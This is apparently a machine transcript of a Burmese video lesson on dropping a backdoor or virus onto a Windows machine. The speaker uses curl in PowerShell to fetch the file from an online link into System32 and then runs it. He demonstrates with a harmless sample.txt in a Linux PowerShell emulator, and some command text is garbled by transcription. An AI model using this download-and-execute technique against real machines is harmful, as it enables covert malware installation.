ခုတခါကျွန်တော်တို့တောင်းမဲ့ပိုင်းကဘာလဲဆိုတော့ဆိုကြပါစို့နော်ကျွန်တော်တို့ရဲ့ virus သို့မဟုတ် backdoor file ကို online ပေါ်မှာ upload တင်ထားတယ်အဲ့ဒီ file ကိုမှကျွန်တော်တို့က Windows machine ထဲကို download ဆွဲချမယ် run မယ်ပေါ့နော်အဲ့အတွက်ဘယ် command ကိုသုံးလဲဆိုတော့ curl ဆိုတဲ့ command ကိုသုံးတယ်ဒါပေမဲ့အဲ့ဒီ command ကို run နိုင်ဖို့ကိုကဘယ်အထက်ကိုရောက်နေရမလဲဆိုရင် Windows ရဲ့ PowerShell ထဲကိုရောက်နေဖို့လိုတယ်ပေါ့နော်အခုနောက်ပိုင်း Windows တွေမှာ PowerShell.exe ဆိုတာပါတယ် Windows နဲ့ R နဲ့ကိုတွဲနှိပ်ပြီးတော့ပေါ်လာတဲ့ box တွေထဲမှာ PowerShell.exe လို့ရိုက်လိုက်ရင်တွေ့ပါလိမ့်မယ်နော်အဲ့တော့ကျွန်တော်ကဒါကို Linux machine ပေါ်မှာ PowerShell emulator ကို run ပြီးတော့မှတရုပ်ပြပေးပါမယ်နော်အဲ့တော့စလိုက်အောင်ကျွန်တော်အခုသုံးနေတာဒီ Linux machine ပေါ့နော်ဒါပေမဲ့ကျွန်တော် Microsoft ရဲ့ PowerShell emulator ကိုဒီမှာတွင်းထားတယ် PowerShell 7.0.2 Copyright Microsoft Corporation All Rights Reserved ဟုတ်ပြီအဲ့တော့ကျွန်တော်တို့ရဲ့ virus သုံး backdoor file ဖြစ်ဒီကောင်လေးကိုကျွန်တော်ကနမူနာအနေနဲ့သုံးမယ်ပေါ့နော်sample.txt ဆိုတာလေးကိုသုံးမယ်ဒါဥပမာပေးတာနော်တကယ် virus file အစစ်မဟုတ်ဘူးသူ့အတွက် download link ကကျွန်တော်တို့ရှိမှာရှိပြီးသားပေါ့နော်ကျွန်တော်တို့ကိုယ်တိုင် upload တင်ထားဆိုတော့ဟုတ်ပြီအဲ့အတွက် curl PowerShell ထဲမှာရိုက်လိုက်ပြီးရင် download link လေးထည့်ပေးလိုက်ပြီးရင် -og အဲ့မှာ Windows ကတကယ် PowerShell အစစ်ကိုသုံးနေတာဆိုရင်ဘာထည့်ပေးရမလဲ c:\windows /system system 32 /sample.txt ဒါမျိုးသုံးပေးနိုင်တယ်ပေါ့နော် system 32အောက်ထဲကို download ဆွဲမယ်ဒါပေမဲ့ကျွန်တော်က Windows အစစ်မဟုတ်ဘဲနဲ့ Linux ပေါ်မှာ PowerShell emulator နဲ့ run တာဖြစ်တဲ့အတွက်ကျွန်တော်က Linux ရဲ့လမ်းကြောင်းကိုပဲထည့်ပေးလိုက် sample.txt ပြီးရင် enter အဲ့တော့ကျွန်တော်ကြည့်လိုက်မယ် dir ဒါဆိုရင်ဒီမှာ sample.txt ဆိုတာလေးရောက်နေပြီပေါ့နော်တကယ်တော့ sample.txt ဆိုတာလေးဒါတကယ်တော့ virus သို့မဟုတ် backdoor ဖြစ်ခဲ့မယ်ဆိုရင်သူ့ရဲ့ Windows machine ထဲကို download ဆွဲပြီးသားဖြစ်နေပြီပေါ့နော်အဲ့တော့ run မယ်ဆိုရင်ဒီတိုင်းလေး sample.exe ပဲထားပါတော့ sample.exe ဒါမျိုးလေး run ပြီးတော့ enter ခောက်ပေးလိုက်ရုံပဲပေါ့နော်အဲ့တော့ PowerShell ကနေတစ်ဆင့် virus သုံး backdoor file ကို download ဆွဲတဲ့အကြောင်းကတော့ဒီလောက်နဲ့ပဲတခန်းရပါစေနော်